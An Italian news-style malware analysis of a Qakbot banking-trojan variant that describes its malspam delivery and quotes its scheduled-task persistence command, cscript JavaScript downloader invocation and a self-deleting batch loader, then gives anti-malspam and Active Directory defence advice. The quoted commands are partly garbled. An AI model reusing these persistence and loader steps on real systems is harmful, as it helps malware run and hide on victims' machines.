Una nuova variante del malware Qakbot (conosciuto anche come Qbot) sta prendendo di mira principalmente le aziende utilizzando tecniche di offuscamento avanzate per passare inosservata ai controlli di sicurezza e renderne quindi più difficile la rimozione.
L’obiettivo del malware Qakbot è quello di rubare credenziali di accesso ai servizi di banking on-line e, successivamente, svuotare i conti corrente delle vittime.
La precedente variante del malware era in grado di monitorare le attività di navigazione del computer infetto e registrare tutte le informazioni relative ai siti Web di istituiti di credito e finanziari.
L’ultima versione di QakBot si distingue anche per la sua caratteristica di riuscire ad individuare e attaccare gli utenti Windows che utilizzano la risorsa di rete Active Directory per la condivisione di risorse hardware e software, con impatti importanti per le aziende e le grandi organizzazioni in termini di accesso alle risorse di rete.
Indice degli argomenti
La catena infettiva del malware Qakbot
Il dropper del malware Qakbot viene distribuito principalmente mediante massicce campagne di malspam o siti Web compromessi dai criminal hacker.
Ad infezione avvenuta, utilizzando il seguente comando:
C:Windowssystem32schtasks.exe /create /tn {guid} Traduzione: C. /tr cmd.exe /C “start /MIN C:Windowssystem32cscript.exe /E:javascript “C:UsersUSERNAMEymwoyf.wpl”. /SETTIMANALE /sc TUE,WED,THU /ST 12:00:00:00 /F
il dropper crea e schedula un processo di sistema che gli garantisce una maggiore persistenza nel sistema e il cui compito è quello di eseguire un downloader scritto in JavaScript in grado di dirottare, in alcuni giorni della settimana e ad orari precisi, la connessione dell’utente verso domini compromessi.
Il downloader viene quindi eseguito mediante il comando:
cmd.exe /C start /MIN C:Windowssystem32cscript.exe /E:javascript C:ProgramData\puigje.wpl”
C:Windowssystem32cscript.exe /E:javascript C:ProgramDatapuigje.wpl
e provvede ad effettuare una richiesta per scaricare il codice sorgente del malware vero e proprio da uno dei domini compromessi mediante l’URI (Uniform Resource Identifier) “/datacollectionservice[.]php3.”. Tale richiesta è completamente criptata mediante operatore XOR e la risposta del dominio sarà l’avvio del download dei file (randalpha)_1.zzz e (randalpha)_2.zzz.
I file offuscati in formato .zzz vengono quindi decodificati dal downloader e immediatamente dopo viene creato un altro task schedulato per eseguire il seguente file batch che serve ad avviare l’infezione vera e propria del computer della vittima da parte del malware Qakbot:
@echo off
type C:ProgramDataHlTzw7GK_1.zzz C:ProgramData HlTzw7GK_2.zzz > C:ProgramDataHlTzw7GK.exe
start C:CProgramDataHlTzw7GK.exe
schtasks.exe /Delete /TN HlTzw7GK /F
del /Q /F C:ProgramData HlTzw7GK_1.zzz C:ProgramData HlTzw7GK_2.zzz
DEL “%~f0”
L’analisi del codice dello script rivela anche che il contenuto dei file offuscati viene automaticamente cancellato subito dopo l’avvio della catena infettiva del malware.
I consigli per difendersi
Come abbiamo detto, il dropper del malware Qakbot viene distribuito mediante massicce campagne di malspam. I criminal hacker sfruttano quindi la disattenzione degli utenti nell’aprire gli allegati di posta elettronica per mettere in ginocchio aziende e organizzazioni, creando danni enormi anche dal punto di vista economico.
Le conseguenze di un’infezione proveniente da malspam dipendono, ovviamente, dal tipo di malware ricevuto. Non esiste, quindi, una regola di difesa precisa contro questo tipo di minaccia, per cui occorre mantenere sempre alta la guardia.
Per difendersi dal malspam è comunque utile seguire queste semplici regole di sicurezza informatica:
- non scaricare o visualizzare mai gli allegati di mittenti sconosciuti;
- trattare sempre gli allegati di mittenti conosciuti come eventualmente sospetti, a meno che le informazioni non siano state esplicitamente richieste;
- non eseguire mai file eseguibili allegati alle email, a meno di non essere assolutamente certi della provenienza;
- se si dovesse aprire il documento in allegato e questi consiglia diversamente, non bisogna mai abilitare le macro all’interno dei prodotti Office;
- in caso di dubbio, contattare il mittente prima di aprire l’allegato per chiedere ulteriori informazioni;
- eseguire sempre la scansione degli allegati con un buon antivirus aggiornato con le ultime firme virali.
Nel caso particolare di Qakbot, inoltre, è necessario mettere in sicurezza le risorse di rete condivise mediante Active Directory.
Molti amministratori di rete, infatti, ignorano che i contenitori virtuali delle Active Directory contengono le chiavi di accesso ai preziosi asset aziendali. Non è raro trovare vecchi database liberamente accessibili on-line e contenenti informazioni riservate e sensibili. Nei casi più gravi è addirittura possibile trovare interi elenchi di utenti con privilegi elevati che non lavorano più nell’azienda vittima degli attacchi informatici.
Per evitare che ciò accada, è necessario mettere in pratica alcuni semplici consigli pratici:
- innanzitutto, le aziende devono individuare esattamente le risorse di rete disponibili e utilizzate per la continuità dei processi produttivi: server, postazioni fissi e mobili ed elenco degli utenti con relativi privilegi;
- è importante poi sollecitare i sys admin e gli amministratori di rete ad effettuare un’attenta gestione dei privilegi utenti all’interno delle varie arie produttive;
- è opportuno, quindi, adottare tutte le preoccupazioni e gli strumenti utili per monitorare costantemente tutto ciò che accade all’interno della propria rete per essere in grado di individuar prontamente eventuali attività malevoli.
Infine, il consiglio per tutte le aziende è quello di mantenere alto il livello di consapevolezza degli utenti e dei dipendenti, avvisandoli periodicamente delle minacce in corso, utilizzando dove possibile un team di esperti per salvaguardare la sicurezza del perimetro “cyber” dell’organizzazione stessa.
